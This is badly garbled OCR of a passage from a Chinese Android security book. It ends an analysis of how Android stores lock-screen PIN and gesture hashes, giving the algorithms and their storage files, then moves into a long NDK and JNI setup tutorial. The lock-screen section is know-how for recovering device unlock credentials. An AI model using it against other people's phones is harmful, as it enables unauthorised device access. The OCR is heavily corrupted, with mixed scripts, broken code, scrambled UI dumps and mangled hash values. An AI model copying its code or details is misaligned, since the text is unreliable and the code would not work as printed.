List«LockPatternView.Cell» pattern = new ArrayList«LockPatternView.Cell»(); 
LockPatternView.Cell се111 = new LockPatternView.Cell(0, 0); 
pattern.add(cell1); 

LockPatternView.Cell cell2 = new LockPatternView.Cell(0, 3); 
pattern.add(cell2); 
LockPatternView.Cell cell3 
pattern.add(cell3); 
LockPatternView.Cell cell4 - new LockPatternView.Cell(0, 7); 
pattern.add(cell4); 

LockPatternView.Cell cell5 = new LockPatternView.Cell1(0, 8); 
pattern.add(cell5); 
System.out.println("pattern:"«toHex(patternToHash(pattern))); 


new LockPatternView.Cell(0, 6); 


手势 点 数据 应 该 是 00 01 02 05 08， 打 印 看 结果 ， 如 图 1-7 所 示 。 


[Zl Console 33 l] Problems B LogCat 
zterminated > Main (5) [Java Application] CA Program Ееѕ\Јама\јге1.8.0 92Xbinjavaw.exe [2017 年 7 月 9 日 T-*-4:09:44) 
pattern:FFECIE70D113BO8B96C7E6CB2B33460E24407AS96GE 
passwordinto:O0DABF2A43CA4A5DCO01410302DCBS8D3F A2 3DDOD21BAFAEC2DD/FAGD73FCECB94655D2105AQB 
salt:88c5a29bc6a5eb79 


l Signing and Keys 


从 运行 结果 友 现 ， 一模一样 ， 这 样 束 完美 地 分 析 完 了 手势 密码 加 密 算法 。 


这 里 再 总 结 一 下 两 种 方式 锁 屏 密码 算法 。 
第 一 种 : 输入 密码 算法 


对 输入 的 明文 密码 + 设备 的 salt 值 进行 MD5 和 SHA1 操 作 ， 之 后 转化 成 hex 值 进行 拼接 即 可 ， 最 终 加 密 信息 保存 到 本 地 目 
录 /data/system/password.key。 


第 二 种 : 手势 密码 算法 


将 九宫 格 手势 密码 中 的 点 数据 转化 成 对 应 的 字 节 数组 ， 然 后 直接 进行 SHA1 加 密 即 可 。 最 终 加 密 信 息 保 人 存 到 本 地 有 目 
录 /data/system/gesture.key。 


1.3 ”本章 小 结 


读 完 本 章 是 不 是 迫不及待 地 想 动手 尝试 一 下 ? 在 操作 之 前 一 定 要 记 住 ， 先 得 到 设备 的 salt 值 ， 然 后 要 注意 源码 版 本 。 


A26 ”Android 中 NDK 开 发 


本 章 主要 介绍 Android 中 的 NDK 开 发 技术 相关 知识 ， 因 为 后 续 章 节 特 别 是 在 介绍 安全 应 用 防护 和 逆向 应 用 的 时 候 ， 会 涉及 
NDK 的 相关 知识 ， 而 且 考虑 到 项 目的 安全 性 开发 ， 把 一 些 重要 的 代码 放 到 底层 也 是 很 重要 的 ， 同 时 能 提高 执行 效率 。 


2.1 搭建 开发 环境 


在 搭建 环境 之 前 必须 先 去 官网 下 载 NDK 工 具 包 ， 官 网 地 址 是 http://wear.techbrood.com/tools/sdk/ndk/， 选 择 相应 平台 
的 NDK 版 本 即 可 。 


2.1.1 Eclipse 环境 搭建 


第 一 步 : 配置 NDK 路 径 ， 如 图 2-1 所 示 。 


25 Preferences 


» General Android NDK Preferences 


4 Android MEME 
Build МОК Location D'XAndroid toolsyandroid-ndk-ri10d 


DDMS 
Editors 
Launch 
Lint Error Checkin 
LogCat 
NDK 
Usage Stats 
> Ant 
b C/C++ 


m Apply 


92-1 配置 NDK 路 径 


第 二 步 : 新 建 Android 项 目 ， 如 图 2-2 所 示 。 


РЕТ: 


9 FE E 


New 


Go Into 


Open in New Window 
Open Type Hierarchy 
Show In 


Copy 
Copy Qualified Name 


Paste 


Delete 


Remove from Context 
Build Path 
Source 


Refactor 


Import... 
Export... 


Refresh 
Close Project 


Clase Unrelated Projects 


Assign Working Sets... 


Profile As 
Debug As 
Run Аѕ 
Validate 
Team 


Compare With 


Restore from Local History... 


Android Tools 


FA 
Alt--Shift--W k 


Ctrl+C 


Ctrl+W 
Delete 


Ctrl - Alt- Shift-- Down 
Ld 
Alt+Shift+S F 
Alt+Shit+T F 


F5 


2-2 ”新 建 Andtoid 项 


点 击 Add Native Support， 出 现 如 图 2-3 所 示 的 lib 命 令 。 


所 击 “Finish”， 表 次 观察 项 目 多 了 jni 文 件 夹 ， 如 图 2-4 所 示 。 


New Test Project... 


New Resource File... 


P Search EJ Console $3 


Export Signed Application Package... 


Export Unsigned Application Package... 


Display dex bytecode 


Rename Application Package 


Fix Project Properties 


Add Support Library... 


Run Lint: Check for Common Errors 


Clear Lint Markers 


Add Native Support... 


ü 


Add Android Native Support 


Settings for generated native components for project. 


Library Name: lb | Hellolm 50 


92-3 ”命令 lib 


а 2 HelloJnil 

b GB src 
28 gen [Generated Java Files] 
mS Android 6.0 
=, Android Private Libraries 
=, Android Dependencies 


ia, assets 


b E» bin 

P EE res 
g| AndroidManifest.xml 
R| ic launcher-web.png 
=| proguard-project.txt 
project.properties 


E2-4 Жата 


在 jni 下 面 残 可 以 开始 编写 native 层 的 代码 。 


第 三 步 : 使 用 javah 生 成 native 的 头 文件 ， 如 图 2-5 所 示 。 
k cn 


Ih] cn wjdiankong  encryptdemo, MainActivity.h 


| EN CAMIndowsVsystem32Xcmd.exe 


:*findrnaidSstudio. uorkspace'*EncruptDemosapp^*src^main'jauva?,;jauah cn.wjdiankong.encruptdemo.Mainfictiuitwu 


- indroid5tudio vorkspace'«EncryptDemo sappsrc'main'jaua?,., 
图 2-5 Ж mnative3k x #F 


注意 : javah 执 行 的 目录 ， 必 须 是 类 包 名 路 径 的 最 上 层 ， 然 后 执行 : 


javah 类 全 名 


第 四 步 : 运行 项 目 ， 点 击 工具 栏 中 的 小 锤子 图 标 如 图 2-6 所 示 。 


File Edit Search Source Refactor Navigate Project Run Window | 


= 18 |e -Kha r a 8 7 [á > @ = 


| Build 'Default' for project "Hallen?! 


У Project Explorer 53 


运行 结果 如 图 2-7 所 示 。 


CDT Build Console [HelloJni] I u 
18:51:22 **** Build of configuration Default for project HelloJni **** 
"D:XXAndroid toolsXXandroid-ndk-rl18dXXndk-build.cmd" all 

Android МОК: WARNING: APP PLATFORM android-21 15 larger than android:minSdkVe 
[armeabi] Сотр11е++ thumb: HelloJni <= HelloJni.cpp 

[armeabi] StaticLibrary : libstdc++.a 

[armeabi] SharedlLlibrary : libHelloJni.so 

[armeabi] Install : libHelloJni.so => libs/armeabi/libHelloJni.so 


18:51:31 Build Finished (took 9s.2780ms) 


21.2 Android Studio 环 境 搭 建 


去 官网 下 载 NDK 工 具 ， 然 后 使 用 Android Studio 中 进行 新 建 一 个 简单 项 目 ， 然 后 创建 JNI 即 可 ， 如 图 2-8 所 示 。 


Y [2 EncryptDemo (D:iVAndroidStudio_workspaceYEncryptDemo) 
к D3.gradle 
H Didea 
Y 四 app 
* DD build 
, B libs 
т O src 
H DandroidTest 
т ÖJ main 
> [у java 


Y Ini 


ii cn_widiankonqg_encryptdemo_MainActivity.h 
[c encrypt.c 
[i encrypt.h 
H Düres 
** Android Manifest.xml 
H O test 
E) .gitignore 
Ji app.iml 
(è build.gradle 
Е] proguard-rules.pro 
图 2-8 ”创建 jni 
第 一 步 : 在 项 目 中 新 建 jhi 目 录 ， 如 图 2-9 所 示 。 
第 二 步 : 用 javah 命 令 生成 native 的 头 文件 ， 如 图 2-10 所 示 。 


第 三 步 : 配置 项 目的 NDK 目 录 ， 如 图 2-11 所 示 。 


(D:XAndroidStudio workspnaceXEncrvotDemo) : : 
Ez EncryptDemo (DAAndroidStudio workspaceVEneryptDemo NDK support is an experimental feature a 


РУ .gradle 
1 ^* ро HOT EDIT THIS FILE 一 it ism 
Idea 
0 idea 2 #include <jmi h> 
арр x 
B а 
ril X Cut Cir E Android resource file u 
[3 сору Ctrl +C Ё Android resource directory ME Жабы] жа арнайы 
[3 sı -UPYy = File ne Included cn wjdisnkon 
Р Сору Раїһ Ctrl+Shift+C E Ж "жеи 


r Copy as Plain Text 


rn "C" I 


Copy Reference Ctrl -Alt--Shift-C Ш) C++ Class Ti 
EL Paste Ctrl+W сн С/С++ Source File 
Find Usages Cir|+ G [к C/C++ Header File lass: cn wjdiankong encryp 
E had Tenat = 
Find in Path... Сїїї+Н W: Image Asset ч ж 
mature: (Ljava/lang/String;!/ 
Replace in Path... iW: Vector Asset ü = 
Analyze h  AIDL Р IPORT jboolean JNICALL Java 
Refactor h m: Activity F Env €, jobject, jstring): 
KL Add to Favorites ^ iW: Android Auto d 
Е £ Show Image Thumbnails - M AIDL Folder 
- im Fragment k К Assets Folder 
Jia Reformat Code... Ctrl-- Alt--L ы 3 - 
(€ b D '/" Google ЧЕЙ INI Folder 
| Optimize Imports... Ctrl-Alt-O | w 
Е! р " Other k Li. Java Folder 
[1 build (W: Create All Tests'.. iW: Service к GL Java Resources Folder 
FA grad Б Run 'All Tests Ctrl-- Shift--F10 Ф ULCcmponent t CL RenderScript Folder 
B .gitig 由 поташ ШЕ Т Wear Р Li. Res Folder 
(È build Local History Z1 Widget " 
91 Encn GJ Synchronize 'app' iP XML " 
[sil grad Show in Explorer 
El grad Fie path Ctrl Alt F12 
E] grad Ё Compare With... Ctrl- D 
[š local | 
(2 setti Open Module Settings F12 
+; settir 


Bi External (& Create Gist.. 


图 2-9 ”新 建 jni 目 录 


k cn 


Ih] cn_widiankong_encryptdemo_MainActivity.h 


EN C'5Windowsisyster332Xemd.exe 


:*AndroidStudio_workspace Encrypt Demo «app*src^main'jaua?,;jauah cn.wjdiankong.encruptdemo.Mainfictiuitwu 


- indroid5tudio vorkspace'«EncryptDemo sapp^src'main'jaua?,., 
图 2-10 ”生成 native 头 文件 
EZ EncryptDemo (DAAndroidStudio workspaceXEncryptDemo) 
Р .gradle 
РУ idea 
| Ls app 
7 build bui 


| їн Wf | T Fa | [| wr 


LJ liba gu uL L LI ET UA 


[3 src [ji Copy Ctrl+C 
РУ android? Copy Path Ctrl+Shift+C 
РУ main Copy as Plain Text 
Ħ Java Copy Reference Ctrl - Alt- Shift-- C 
РУ jni [ЇЇ Paste Ctrl - V 
* cr Find Usages Ctrl 4-G 
€ er Find in Path... Ctrl+H 
Hü ег Replace In Path... 
Ёа res Analyze 
E Andr: Refactor 
Ји Add to Favorites 
Е pem Show Image Thumbnails 
J| app.iml 
D ыйык Reformat Code... Ctrl - А+ 
5 анна Optimize Imports... Ctrl - АЕО 
РУ build iW! Create 'All Tests"... 
M gradle Б Run 'All Tests Ctrl-- Shift F10 
Е gitignore E Debug 'All Tests' 
(** build.gradle Local History 


引 EncryptDemo.in © Synchronize 'app' 

[sil gradle.properti — show in Explorer 

Е] aradlew 

Е] aradlew.bat 

[dl local.properties 

(È settings.gradle Open Module Settings 
Ш} External Libraries (Š) Create Gist.. 


File Path Ctrl - Alt--F12 


EE Compare With... Ctrl+D 
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选择 模块 的 设置 选项 Open Module Settings， 如 图 2-12 所 示 。 


@ Project Structure 


+. SDK Location 


SDK Location 


Android SDK location: 


чы The directory where the Android SDK is located. This location will be used for new projects, and 
Developer Services property. 

Ads | | | 
И D: Android toolskAndroidSdk 

Analytics 


Authentication " 
JDK location: 


Cloud The directory where the Java Development Kit (JDK) is located. 
Notifications 

Modules CAProgram FilesJavaNydk1.7.0 79 
Em app 


Android NDK location: 
The directory where the Android NDK is located. This location will be saved as ndk.dir property 


DXAÀndroid toolskandroid-ndk-rllc-windows-x86 64Xandroid-ndk-rlilc 
图 2-12 ”模块 的 设置 选项 
在 其 中 设置 NDK 目 录 即 可 。 


第 四 步 : 配置 Gradle 中 的 ndk 选 项 ， 如 图 2-13 所 示 。 


defaultConfig Í 
applicationld "cn. wjdisnkong. encryptdemo" 
minSdkVersion 15 
targetSdkVerzion Z3 
versionCode 1 


versionllame "1.0" 


ndk { 
= = o rr s= | — al = mb 
modulellame encrypt V REE [ss ) FEE 
abiFilters "armesbi", “grmeshi-v7a"” "x86" Sm Ee = Frabi E SE šS F F s, 7 51588715, lib 下面 训 总 并 Е 


ldLibs "leg" ЛЛ оғ 871: bE 


2-13 BC € gradle 


这 里 只 需要 设置 编译 之 后 的 模块 名 ， 即 so 文件 的 名 称 ， 以 及 产生 哪 几 个 平台 下 的 so 文件 ， 需 要 用 到 的 lib 库 ， 这 里 用 到 了 
Android 中 打印 log 的 库 文 件 。 


第 五 步 : 编译 运行 生成 so 文件 


在 build 目 录 下 生成 指定 的 so 文件 ， 找 贝 到 项 目的 libs 目 录 下 即 可 ， 如 图 2-14 所 示 。 


Y ГЕарр 
в [D build 
т O libs 
* Darmeabi 


armeabi-v7a 


libencrypt.so 
ь O х86 


92-14 项 目的 libs 目 录 


22 ”第 一 行 代 码 : HelloWorld 


本 节 开 始 介绍 JNI 技 术 ， 移 输出 一 个 Hello World。 具 体 流程 如 下 ， 在 Java 中 定义 一 个 方法 ， 在 C++ 中 实现 这 个 方法 ， 在 方 


法 内 部 输出 “Hello World”， 然 后 再 回 到 Java 中 进行 调用 。 
第 一 步 : 在 Eclipse 中 建立 一 个 类 : JNIDemo, 
命令 如 下 : 


package com.jni.demo; 
public class JNIDemo { 
[1 定义 一 个 本 地 方法 
public native void вауНе11о(); 
public static void main(String[] args)t 


/ / 调用 动态 链接 库 


System.loadLibrary ("JNIDemo"); 
JNIDemo jniDemo = new JNIDemo(); 
jniDemo.sayHello(); 


其 中 sayHello 就 是 要 在 C++ 中 实现 的 方法 。 
第 二 步 : 使 用 avah 命 令 将 JNIDemo 生 成 .h 的 头 文件 。 
命令 如 下 : 
E:NworkspaceNJNIDemoNbin>jJavah com.jni.demo.JNIDemo 
HER: 


- 首先 要 确保 配置 了 Java 的 环境 变量 ， 不 然 javah 命 令 不 能 用 。 


- 案例 的 Java 项 目 是 放 在 也 : \workspace 中 的 ， 所 以 首先 进入 项 目的 bin 目 录 中 ， 后 使 用 javah 命 令 生 成 头 文件 。 
- javah 后 面 的 类 文件 格式 是 类 的 全 名 ( 包 名 +class 文 件 名 ) ， 同 时 不 能 有 .class 后 级 。 


命令 执行 成 功 后 会 在 bin 目 录 中 生成 头 文件 com jni demo JNIDemo.h， 参 见 图 2-15。 


D: Mindroid, vorkspace \NDKDemo>cd bin 


: ndroid караса MN ааган cn.wjdiankong.ndkdemo.Mainfictivity 
BS. 找 不 到 ， cn.vjdiankong.ndkdemo.Mainfictivity' 的 类 文件 。 
在 bin\classes 目录 下 运行 命令 ， 但 是 如 果 一 
AIRE RR api. edt d FRU EO 
类 文件 ， 所 以 需要 到 src 目录 下 运行 命令 


BED. XE works pace NNDKDemo *bin*sclasses»javah cn. wjdiankong. ndkdemo .Маіпӣссіуієу 


2: А jendreid. app.fictivity 
Я 


ES] android.app.flctiu ity 的 类 文件 


D:Nhndroid_workspaceNVNDKDemo\hbinNclassesz>cd .. 


D: Mindroid vorkspace NNDKDemo *bin»cd .. 
єк Uu HI d 2] = 运行 命令 ， 然 
р: ndroid_workspace NNDKDemo>cd src 需要 切换 到 sre HK P, J ip 全 后 


就 可 以 产生 指定 的 头 文件 在 src 目录 下 
D: \Android_workspace NNDKDeno Ns rc Жачаһ cn.wjdiankong.ndkdemo.Mainflictivity 


р: findroid, vorks pace NNDKDemo ssrc >, 


2-15 javah 命 人 


M 
^ 
z 


注意 : 如 果 包 含 native 方 法 的 类 ， 引 用 其 他 地 方 的 类 ， 那 么 进入 binNclasses\ 目 录 下 会 出 现 问题 提示 找 不 到 指定 的 类 ， 这 时 
候 需 要 切换 到 源码 目录 src 下 运行 即 可 。 


第 三 步 : 使 用 VC6.0 生 成 .dl 文件 。 
自 先 创建 一 个 dl 工程 ， 如 图 2-16~ 图 2-18 所 示 。 


在 .cpp 文 件 中 输入 如 下 代码 : 


#include<iostream. h> 
#include "com_jni_demo_JNIDemo.h" 


JNIEXPORT void JNICALL Java com jni demo JNIDemo sayHello (JNIEnv * env, jobject obj) 


{ 


cout<<"Hello Мог1а"<<епаі1; 


) 


yE EJEA 
е IE | 工作 区 | REXB | 


£i ATL COM AppWizard TE ЦЫ]: 
4: | Cluster Resource Туре Wizard 
jj Custom Apps Yizard 


Database Project : 

sm DevStudia Add-in Wizard ICE 

= Extended Stored Proc Wizard Ни A 
"ISAPI Extension Wizard 

i| Makefile 

а МЕС Activex Controlvzizard 

ë] МЕС AppWizard (dll) * 创建 新 的 工作 空 同 [BI 

ЕЙ МЕС AppWizard [exe] С 天 加 到 当前 工作 空间 内 

чм New Database Wizard E 


T1 Utility Project 


a 'Win3?2 Application |.JNIDemo | 


Win32 Console Application 


|Win32 DynamicLink Library 


$| Win tatic Library 


* [P]: 


“ 


— ° || жй | 


图 2-16 VC6.0 生 成 .dll 文 件 


Win32 Dynamic-Link Library - 2 1 #t 1 zF E" 


ZA AAE ЗН DLL ? 


C 一 个 空 的 DLL T [E] 


© 一 个 简单 的 DLL T (S) 


一 个 可 以 导出 某 些 村 与 的 DLL TED) 


2-17 VC6.0 生 成 .dl 文件 


[| ӨҢЕ ”编辑 ([E) EEV 插入 中 Тї (Р) 组 建 (B) 工具 中 窗口 WW) #EBH(H) 


eiu + в mme w I 


" // 123.cpp : Defines the entry point for the DLL application. 
zz 


= 123 classes 
--&3 Globals 


@| DIilMain[HAND 


Hinclude "stdafx.h" 


BOOL APIENTRY Dl11Hain( HANDLE hHodule, 
DWORD ul reason for call, 
LPUDID lpReserued 
) 


return TRUE; 


4 TEN F 


mucjassv...| E] FileView 


图 2-18 VC6.0 生 成 .dl 文件 


这 个 方法 的 声明 可 以 在 上 面 生 成 的 com jni demo JNIDemo.h 头 文件 中 找到 ， 这 个 束 是 Java 工 程 中 的 sayHello 方 法 的 实 
现 : 


JNIEXPORT void JNICALL Java com jni demo JNIDemo sayHello (JNIEnv * env, jobject obj) 
{ 


cout««"Hello World"<<endl; 


这 里 编译 会 出 现 以 下 几 个 问题 : 


1) 会 提示 找 不 到 相应 的 头 文 件 ， 如 图 2-19 所 示 。 这 时 需要 将 jni.h、jni_md.h 文 件 拷贝 到 工程 目录 中 ， 这 两 个 文件 的 具体 位 
置 参见 图 2-20。 


Java 安 痛 目 录 中 的 include 文 件 夹 下 ，jni_md.h 文 件 企 win32 文 件 夹 中 ， 找 到 这 两 个 文件 后 ， 将 其 拷贝 到 C++ 的 工程 目录 
中 。 


公称 颂 改 日 期 A 大 小 
1; Debug 2013/12/2110:53 ЖЕ 

2013/12/21 10:37 С Header file 1 KB 

2013/7/20 22:04 C Header file /2 KB 

2013/7/20 22:04 C Header file 1 KB 
i] INIDemo.cpp 2013/12/21 10:53 C++ Source file 1 KB 
JNIDemo.dsp 2013/12/2113:06 Project File 5 KB 
JNIDemo.dsw 2013/12/21 13:06 Project Workspa... 1 KB 
|_| JNIDemo.ncb 2013/12/21 13:060 МСЕ УФ 33 KB 
| | JINIDemo.opt 2013/12/2113:06 OPT x4 48 KB 
Æ INIDemo.pla 2013/12/21 10:53 HTML 文档 2 KB 
1 ReadMe.txt 2013/12/21 10:47 УФУ 2 KB 
Ii] StdAfx.cpp 2013/12/21 10:47 C++ Source file 1 KB 
[h] StdA£fx.h 2013/12/21 10:47 С Header file 1 KB 


图 2-19 ”编译 之 后 的 头 文 件 


文人 ШШЕ ==0 тап 帮助 (H) 
组 织 ”包含 到 库 中 — SEC аә PELHA 


k. FE Ы win32 2013/7/20 22:04 ”文件 去 
] classfile constants. 2013/7/20 22:04 eader file 20 KB 
h] classfil tants.h 2013/7/20 22: C Header fil 20 K 
E 最 近 访 问 的 位 置 [h] jawt.h 2013/7/20 22:04 C Header file 9 KB 
| [b] jdwpTransport.h 2013/7/20 22:04 C Header file 7 KB 
= = | 2013/7/20 22:04 — C Header file 72 KB 
né [h] jvmti.h 2013/7/20 22:04 C Header file 76 KB 
m PPpTV 视 频 M ЎА н 
E OE [h] jvmticmlr.h 2013/7/20 22:04 C Header file 4 KB 
= Subversion 
Н ЕЗ 
кы] 图 片 
EP 
mi) 迅雷 下 载 


图 2-20 jni.h 文 件 


2) 当 拷 贝 到 这 两 个 文件 之 后 ， 编 译 还 是 提示 找 不 到 这 两 个 文件 : 主要 原因 是 #include<jni.h> 是 从 系统 目录 中 查找 jni.h 头 
文件 的 ， 而 这 里 只 把 jni.h 拷 贝 到 工程 目录 中 ， 所 以 需要 在 com jni demo JNIDemo.h 头 文件 中 将 #include<jni.h> 改 成 
#include"jni.h"。 同 理 ， 在 jni.h 文 件 中 将 #include<jni md.h> 改 成 #include"jni md.h"。 


3) 同时 还 有 一 个 错误 提示 : e: \с+ +\јпіаето\јпіаето.срр (9) : fatal error C1010: unexpected end of file while 
looking for precompiled header directive， 这 是 指 预 编 详 头 文 件 读 写 错误 ， 这 时 候 还 要 在 VC 中 进行 设置 : 项 目 一 设置 
一 C/C++。 在 分 类 中 选择 预 编 译 的 头 文件 ， 选 择 不 使 用 预 补偿 页 层 ， 如 图 2-21 所 示 。 


这 样 ， 编 译 成 功 ， 生 成 JNIDemo.dll 文 件 在 C+ + 工程 中 的 Debug 目 录 中 。 


注意 : 因为 之 前 开发 都 是 使 用 VC 工具 ， 所 以 这 里 使 用 了 VC 6.0 来 进行 C++ 代码 的 编写 和 运行 ， 其 实 可 以 直接 使 用 Eclipse 或 
在 Andtoid Studio 中 也 可 以 进行 编写 ， 这 样 会 更 方便 。 


第 四 步 : 将 JNIDemo.dll 文 件 添加 到 环境 变量 中 ， 如 图 2-22 所 示 。 


注意 : 在 用 户 变量 中 的 path 设 置 ， 用 分 号 隔 开 : “; E: NGC++NDebug”， 这 样 就 将 .dl 文件 添加 到 环境 变量 中 了 。 
第 五 步 : 在 Eclipse 中 调用 sayHello 方 法 ， 输 出 “Hello World”。 代 码 如 下 : 
public static void main(String[] args)( 

/ / 调用 动态 链接 库 


System. loadLibrary ("JNIDemo"); 
JNIDemo jniDemo = new JNIDemo(); 


jniDemo.sayHello(); 


) 
Project Settings 
WES): |win32 Debug -| EN ү) E| жЕ | MIDL | Bu 
+ 


° ан ЕЕ 


ОЕ 
C ЕЕ Та ЕЕ АУЕ [pch] 


~ 
C AHA ШИ CT. pch) 


一 一 一 一 一 一 


工程 选项 [Oj: 


inologo /MTd fW3 {бт fom Д1 Od JD WIN ID > 
" DEBUG" D" WINDOWS JD" MBCS" D 
" USRDLL" /D "M'r123 EXPORTS" /Fo"Debug7/" 


r 


取消 | 


2-21 预 编 译 头 文件 


path 


tudi о чУС9а bi 


MEIavlir 


MITSERPRÜFTT FS enata VT aen] VTenn 


AERE (5) 


EH iB 
05, Windows HT 


Path C: Sl indowz*system32;C: Windowsi... 
FATHEXT . COM; . EXE;. BAT; .CMD;. VES:. VBE;.... 
FRNCESSOR АЕ nh 


OIT 
2-22 ”将 JINIDemo.dl 文 件 添 加 到 环境 变量 中 
System.loadLibrary 方 法 是 加 载 JNIDemo.dll 文 件 的 ， 一 定 要 注意 不 要 有 .dl 后 缀 名 ， 只 需要 文件 名 即 可 。 


注 晶 ， 运 行 的 时 候 会 报错 ， 如 图 2-23 所 示 。 


[ži Problems @ Javadoc [ig Declaration | Ez] Console 52 LogCat * Debug 


zterminated > JINIDemo [Java Application] CAProgram FilesJavaMre7Abinjavaw.exe (20135712 H21H  E*F11:09:48) 
Exception in thread "main" java.lang.UnsatisfiedLinkError: no JNIDemo in java.library.path 

at java.lang.ClassLoader.loadLibrary(Unknown Source) 

at java.lang.Runtime.loadLibrary8(Unknown Source) 

at java.lang.System.loadLibrary(Unknown Source) 

at com.jni.demo.JNIDemo.main( JMIDemo.?]java:8) 


这 个 提示 是 没有 找 有 JNIDemo.dll 文 件 ， 这 时 需要 关闭 Eclipse， 然 后 再 打开 ， 运 行 就 没有 错 了 。 原 因 是 Eclipse 每 次 打开 的 
时 候 都 会 去 读 取 环 境 变量 的 配置 ， 刚 才 配 置 的 path 没 有 立即 生效 ， 所 以 要 关闭 Eclipse， 然 后 重新 打开 一 次 即 可 。 


注意 : 这 里 因为 使 用 了 VC 编辑 器 进行 native 代 码 的 编写 ， 所 以 需要 配置 山 文件 操作 ,但 是 现在 更 多 的 是 习惯 直接 在 
Eclipse/Andtoid Studio 中 配置 C+ 二 环境 直接 编写 了 ， 这 样 更 方便 。 


2.3 JNIEnv 类 型 和 object 类 型 


上 一 节 介 绍 的 是 一 个 简单 的 应 用 ， 说 明 JN| 是 怎么 工作 的 ， 这 一 节 介 绍 本 地 方法 sayHello 的 参数 及 其 使 用 。 
首先 来 看 一 下 C++ 中 的 sayHello 方 法 的 实现 : 


JNIEXPORT void JNICALL Java com jni demo JNIDemo sayHello (JNIEnv * env, jobject obj) 
{ 


cout««"Hello Мог1а"<<епа1; 


) 


2.3.1 JNIEnv 类 型 


JNIEnv 类 型 实际 上 代表 了 Java 环 境 ， 通 过 JNIEnvV* 指 针 融 可 以 对 Java 闯 的 代码 进行 操作 。 例 如 ， 创 建 Java 类 中 的 对 象 ， 调 用 
Java 对 和 象 的 万 法 ， 获 取 Java 对 象 中 的 属性 等 。 


JNIEnv 类 中 有 很 多 水 数 可 以 用 ， 如 下 所 示 : 
- NewObject: 创建 Java 类 中 的 对 象 。 
. NewStting: 创建 Java 类 中 的 String 对 象 。 
· New<Type>Array: 创建 类 型 为 Type 的 数组 对 象 。 
: Get<Type>Field: 获取 类 型 为 Type 的 字段 。 
. Set<Type>Field: 设置 类 型 为 Type 的 字段 的 值 。 


- GetStatic<Type>Field: 获取 类 型 为 Type 的 static 的 字段 。 


“ SetStatic<Type>Field: 设置 类 型 为 Type 的 static 的 字段 的 值 。 
: Са1<Туре> Method: 调用 返回 类 型 为 Type 的 方法 。 
: СаП$тайс<'Туре>Ме оа: 调用 返回 值 类 型 为 Type 的 static 方 法 。 


更 多 的 函数 使 用 可 以 查看 jni.h 文 件 中 的 函数 名 称 。 
2.3.2 jobject 参 数 obj 


如 果 native 方 法 不 是 static，obj 惑 代表 native 方 法 的 类 实例 。 


如 果 native 方 法 是 static，obj 惑 代表 native 方 法 的 类 的 class 对 象 实例 (static 方 法 不 需要 类 实例 的 ， 所 以 惑 代 表 这 个 类 的 
class 对 象 ) 。 


2.33 Java 类 型 和 native 中 的 类 型 映射 关系 


Java 和 C++ 中 的 基本 类 型 的 映射 天 系 参 见 表 2-1。 


表 2-1 Java 和 C++ 中 的 基本 类 型 的 映射 关系 


Java 类 型 本 地 类 型 JNI 定义 的 别名 
boolean unsigned char JobJect 


具体 的 说 明 可 以 查看 jni.h 文 件 。 


2.3.4 jclass 类 型 


为 了 能 够 在 C/C++ 中 使 用 Java 类 ，jni.h 头 文件 中 专门 定义 了 jclass 类 型 来 表示 Java 中 的 Class 类 。 
JNIEnv 类 中 有 如 下 几 个 简单 的 函数 可 以 取得 jclass: 


- jclass FindClass (const chafkclsName) : 通过 类 的 名 称 (类 的 全 名 ， 这 时 候 包 名 不 是 用 点 号 而 是 用 /来 区 分 的 ) 来 获取 


jclass。 如 : jclass str=env->FindClass ("java/lang/String") ; 获取 Java 中 的 Stting 对 象 的 class 对 象 。 
- jclass GetObjectClass (jobject obj) : 通过 对 象 实例 来 获取 jclass， 相 当 于 Java 中 的 getClass 方 法 。 


: jclass GetSuperClass (jclass obj) : 通过 jclass 可 以 获取 其 父 类 的 jclass 对 象 。 


2.3.5 native 中 访问 Java 层 代码 


在 C/C++ 本 地 代码 中 访问 Java 妆 的 代码 ， 一 个 剃 见 的 应 用 束 是 获取 类 的 属性 和 调用 类 的 万 法 ， 为 了 在 C/C++ 中 表示 属性 和 
方法 ，JNI 在 jni.h 头 文件 中 定义 了 jfieldld、jmethodID 类 型 来 分 别 代表 Java 闯 的 属性 和 方法 。 在 访问 或 者 设置 Java 属 性 的 时 候 ， 


首先 就 要 先 在 本 地 代码 取得 代表 该 Java 属 性 的 jfieldID， 然 后 才能 在 本 地 代码 中 进行 Java 属 性 操作 ， 同 样 ， 需 要 调用 Java 端 的 方 
法 时 ， 也 是 需要 取得 代表 该 方法 的 ImethodID 才 能 进行 Java 方 法 调用 。 


使 用 JNIEnv 的 如 下 方法 : 

: GetFieldID/GetMethodID 

: GetStaticFieldID/GetStaticMethodID 
来 取得 相应 的 jfieldIiD 和 jmethodID。 
下 面 来 具体 看 一 下 这 几 个 方法 。 
GetFieldID 方 法 如 下 : 


GetFieldID(jclass clazz,const char* name,const char* sign) 


方法 的 参数 说 明 : 

' clazz: 这 个 方法 依赖 的 类 对 象 的 class 对 象 。 

-name: 这 个 字段 的 名 称 。 

sign: 这 个 字段 的 签名 (每 个 变量 ， 每 个 方法 都 是 有 签名 的 ) 。 
怎么 查看 类 中 的 字段 和 方法 的 签名 呢 ? 使 用 avap 命 令 ， 如 下 所 示 。 


E: workspace JNIDemo Nbin"NscomNjniNemo>jauap -s -p JNIDemo.class 
Compiled from "JNIDemo.;java" 
public class com.jni.demo.JNIDemo < 
public com.jni.demo.JNIDemot»; 
Signature: СЭ) 


public native void ѕауНе110<›; 
Signature: (>U 


public static void main€Cjaua.lang.StringI15; 
Signature: &«XI[Ljava/lang/String;»U 


GetMethodID 也 能 够 取得 构造 函数 的 jimethodID， 创 建 一 个 Java 对 象 时 可 以 调用 指定 的 构造 方法 ， 后 续 将 向 大 家 介绍 ， 
如 : 


env->GetMethodiID(data Class,"«init»","()V"):; 


签名 的 格式 见 表 2-2。 


表 2-2 签名 的 格式 


类 型 相应 的 签名 

m LJ / 3819 0536344; Ljavarlang/String; 
Int [签名 [I [Ljava/llang/Object; 

long (参数 类 型 签名 …) 返回 值 关 型 签名 


下 面 来 看 一 例子 : 


import java.util.Date; 
public class Не11о{ 
public int property; 
public int function(int foo, Date date, int[] агг) { 
System.out.println("function"); 
return 0; 
} 
public native void test(); 


) 


/ /test 本 地 方法 实现 
JNIEXPORT void Java Hello test(JNIEnv* env, jobject ob] ) { 
// WX test 不 是 静态 函数 ， 所 以 传 进 来 的 就 是 调用 这 个 函数 的 对 象 
// 否则 就 传 入 一 个 jclass 对 象 表示 native 方法 所 在 的 类 
Jclass hello clazz = env-»GetObjectClass(obj); 
jfieldid fieldId prop = env-»GetFieldId( 
hello clazz, "property", "I"); 
jmethodId methodlId func = env-»GetMethodIid( 
